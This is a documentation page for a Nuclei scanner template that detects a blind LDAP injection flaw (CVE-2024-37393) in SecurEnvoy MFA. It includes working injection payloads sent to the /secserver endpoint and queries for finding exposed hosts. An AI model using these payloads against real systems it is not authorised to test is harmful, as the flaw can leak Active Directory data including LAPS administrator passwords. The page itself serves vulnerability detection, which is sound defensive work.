Skip to content
Nuclei Templates

SecurEnvoy Two Factor Authentication - LDAP Injection

ID: CVE-2024-37393

Severity: critical

Author: s4e-io

Tags: cve,cve2024,securenvoy,ldap

Description

Section titled “Description”

Multiple LDAP injections vulnerabilities exist in SecurEnvoy MFA before 9.4.514 due to improper validation of user-supplied input. An unauthenticated remote attacker could exfiltrate data from Active Directory through blind LDAP injection attacks against the DESKTOP service exposed on the /secserver HTTP endpoint. This may include ms-Mcs-AdmPwd, which has a cleartext password for the Local Administrator Password Solution (LAPS) feature.

YAML Source

Section titled “YAML Source”
id: CVE-2024-37393
info:
  name: SecurEnvoy Two Factor Authentication - LDAP Injection
  author: s4e-io
  severity: critical
  description: |
    Multiple LDAP injections vulnerabilities exist in SecurEnvoy MFA before 9.4.514 due to improper validation of user-supplied input. An unauthenticated remote attacker could exfiltrate data from Active Directory through blind LDAP injection attacks against the DESKTOP service exposed on the /secserver HTTP endpoint. This may include ms-Mcs-AdmPwd, which has a cleartext password for the Local Administrator Password Solution (LAPS) feature.
  reference:
    - https://www.tenable.com/cve/CVE-2024-37393
    - https://www.optistream.io/blogs/tech/securenvoy-cve-2024-37393
    - https://securenvoy.com
  metadata:
    verified: true
    shodan-query: title:"SecurEnvoy"
    fofa-query: title="SecurEnvoy"
  tags: cve,cve2024,securenvoy,ldap


variables:
  userid: "{{to_lower(rand_base(20))}}"


http:
  - raw:
      - |
        POST /secserver/? HTTP/2
        Host: {{Hostname}}


        FLAG=DESKTOP
        1
        STATUS:INIT
        USERID:{{userid}})(sAMAccountName=*
        MEMBEROF:Domain Users


      - |
        POST /secserver/? HTTP/2
        Host: {{Hostname}}


        FLAG=DESKTOP
        1
        STATUS:INIT
        USERID:*)(sAMAccountName=*
        MEMBEROF:Domain Users


    matchers:
      - type: dsl
        dsl:
          - "contains(body_1, 'Error checking Group')"
          - "status_code_1 == 200"
          - "contains(body_2, 'GETPASSCODE')"
          - "status_code_2 == 200"
        condition: and
# digest: 4a0a00473045022100a189d9a30206f1d4737f449594eb3675ee6209181c1267ae1d3fe363935e2813022072aec58a26566c66f06a8f7906380813c1b678bcbcf287e8ab6a8918eadccf9d:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-37393.yaml"

View on Github